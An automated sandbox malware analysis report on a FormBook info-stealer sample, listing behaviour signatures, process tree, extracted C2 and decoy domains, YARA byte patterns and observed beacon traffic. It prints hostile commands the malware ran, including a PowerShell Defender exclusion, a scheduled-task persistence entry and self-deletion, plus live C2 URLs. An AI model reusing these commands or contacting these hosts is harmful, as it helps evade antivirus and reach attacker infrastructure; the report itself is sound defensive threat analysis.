Analysis Report Ms5nQdSz5l.exe

Overview

General Information

Sample Name: Ms5nQdSz5l.exe
Analysis ID: 404105
MD5: ba01df16e4c876e078348fd4479a8fdf
SHA1: 6c7f20976d3e7d9bf9f8a410cbc54962d1ef52bb
SHA256: 8353e30c6566795da3e5aa38a22b4707ee895cfa115ffa399cfbe7d57d00f91d
Tags: AgentTesla, exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Non Interactive PowerShell
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Ms5nQdSz5l.exe (PID: 3560 cmdline: 'C:\Users\user\Desktop\Ms5nQdSz5l.exe' MD5: BA01DF16E4C876E078348FD4479A8FDF)
    • powershell.exe (PID: 6188 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6208 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6268 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Ms5nQdSz5l.exe (PID: 6452 cmdline: C:\Users\user\Desktop\Ms5nQdSz5l.exe MD5: BA01DF16E4C876E078348FD4479A8FDF)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 2196 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 6848 cmdline: /c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.kelurahanpatikidul.xyz/op9s/"], "decoy": ["playsystems-j.one", "exchange.digital", "usaleadsretrieval.com", "mervegulistanaydin.com", "heavythreadclothing.com", "attorneyperu.com", "lamuerteesdulce.com", "catxirulo.com", "willowrunconnemaras.com", "laospecial.com", "anchotrading.com", "mycreditebook.com", "jiujiu.plus", "juniperconsulting.site", "millionairsmindset.com", "coronaviruscuredrugs.com", "services-office.com", "escanaim.com", "20svip.com", "pistonpounder.com", "lasecrete.com", "sabaimeds.com", "madinatalmandi.com", "jumlasx.xyz", "smartspeicher.net", "punkyprincess.com", "herren-pharma.com", "belfastoutboard.com", "safifinancial.info", "xn--15q04wjma805a84qsls.net", "washingtonrealestatefinder.com", "jewishdiaspora.com", "aerinfranklin.com", "taylorglennconsulting.com", "fartoogood.com", "samjinblock.com", "minianimedoll.com", "saporilog.com", "littlebirdwire.com", "xn--farmasi-kayt-c5b.com", "purifiedgroup.com", "purifymd.com", "renewedspacesofva.com", "pilardasaude.com", "varietycomplex.com", "leadsprovider.info", "streamxvid.com", "manuelbriand.com", "hellosunshinecrafts.com", "hellodecimal.com", "4980057280880200.xyz", "dynmit021.digital", "hotdogvlog.com", "fairyrugs.com", "ievapocyte.com", "prospecsports.com", "proteknical.com", "36rn.com", "mongdols.com", "rentportals.com", "drcpzc.com", "h59h.com", "sonjowasi.com", "nalanmeat.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
9.2.Ms5nQdSz5l.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
9.2.Ms5nQdSz5l.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.Ms5nQdSz5l.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17619:$sqlite3step: 68 34 1C 7B E1
  • 0x1772c:$sqlite3step: 68 34 1C 7B E1
  • 0x17648:$sqlite3text: 68 38 2A 90 C5
  • 0x1776d:$sqlite3text: 68 38 2A 90 C5
  • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\Ms5nQdSz5l.exe', ParentImage: C:\Users\user\Desktop\Ms5nQdSz5l.exe, ParentProcessId: 3560, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe', ProcessId: 6188

Signature Overview


AV Detection:

Found malware configuration
Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.kelurahanpatikidul.xyz/op9s/"], "decoy": ["playsystems-j.one", "exchange.digital", "usaleadsretrieval.com", "mervegulistanaydin.com", "heavythreadclothing.com", "attorneyperu.com", "lamuerteesdulce.com", "catxirulo.com", "willowrunconnemaras.com", "laospecial.com", "anchotrading.com", "mycreditebook.com", "jiujiu.plus", "juniperconsulting.site", "millionairsmindset.com", "coronaviruscuredrugs.com", "services-office.com", "escanaim.com", "20svip.com", "pistonpounder.com", "lasecrete.com", "sabaimeds.com", "madinatalmandi.com", "jumlasx.xyz", "smartspeicher.net", "punkyprincess.com", "herren-pharma.com", "belfastoutboard.com", "safifinancial.info", "xn--15q04wjma805a84qsls.net", "washingtonrealestatefinder.com", "jewishdiaspora.com", "aerinfranklin.com", "taylorglennconsulting.com", "fartoogood.com", "samjinblock.com", "minianimedoll.com", "saporilog.com", "littlebirdwire.com", "xn--farmasi-kayt-c5b.com", "purifiedgroup.com", "purifymd.com", "renewedspacesofva.com", "pilardasaude.com", "varietycomplex.com", "leadsprovider.info", "streamxvid.com", "manuelbriand.com", "hellosunshinecrafts.com", "hellodecimal.com", "4980057280880200.xyz", "dynmit021.digital", "hotdogvlog.com", "fairyrugs.com", "ievapocyte.com", "prospecsports.com", "proteknical.com", "36rn.com", "mongdols.com", "rentportals.com", "drcpzc.com", "h59h.com", "sonjowasi.com", "nalanmeat.com"]}
Multi AV Scanner detection for submitted file
Source: Ms5nQdSz5l.exe | Virustotal: Detection: 26%
Yara detected FormBook
Source: Yara match | File source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Ms5nQdSz5l.exe | Joe Sandbox ML: detected
Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Ms5nQdSz5l.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Ms5nQdSz5l.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 0000000B.00000000.350623298.000000000F5A0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: Ms5nQdSz5l.exe, 00000009.00000003.243388587.0000000000F30000.00000004.00000001.sdmp, mstsc.exe, 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Ms5nQdSz5l.exe, mstsc.exe
Source: Binary string: mstsc.pdbGCTL | source: Ms5nQdSz5l.exe, 00000009.00000002.389539524.0000000002FA0000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdb | source: Ms5nQdSz5l.exe, 00000009.00000002.389539524.0000000002FA0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 0000000B.00000000.350623298.000000000F5A0000.00000002.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.kelurahanpatikidul.xyz/op9s/
Performs DNS queries to domains with low reputation
Source: DNS query: www.4980057280880200.xyz
Source: global traffic | HTTP traffic detected: GET /op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX HTTP/1.1 Host: www.safifinancial.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX HTTP/1.1 Host: www.safifinancial.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.safifinancial.info
Source: powershell.exe, 00000007.00000003.422711035.0000000008CEA000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsoft.
Source: powershell.exe, 00000007.00000003.422711035.0000000008CEA000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microszt
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Ms5nQdSz5l.exe, 00000000.00000002.244358631.00000000030A1000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.439791337.00000000048F1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Ms5nQdSz5l.exe, Ms5nQdSz5l.exe, 00000009.00000000.239718276.0000000000622000.00000002.00020000.sdmp, mstsc.exe, 00000017.00000002.504404849.0000000004C22000.00000004.00000001.sdmp | String found in binary or memory: http://vbcity.com/forums/t/51894.aspx
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Ms5nQdSz5l.exe, Ms5nQdSz5l.exe, 00000009.00000000.239718276.0000000000622000.00000002.00020000.sdmp, mstsc.exe, 00000017.00000002.504404849.0000000004C22000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/MrCylops
Source: powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000003.361866562.00000000052D1000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.360111569.0000000005297000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.375059377.0000000004D54000.00000004.00000001.sdmp | String found in binary or memory: https://go.micro
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: Ms5nQdSz5l.exe, 00000000.00000002.242851987.0000000001380000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0041A060 NtClose,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0041A110 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_00419F30 NtCreateFile,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_00419FE0 NtReadFile,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011399A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011398F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011395D0 NtClose,LdrInitializeThunk,
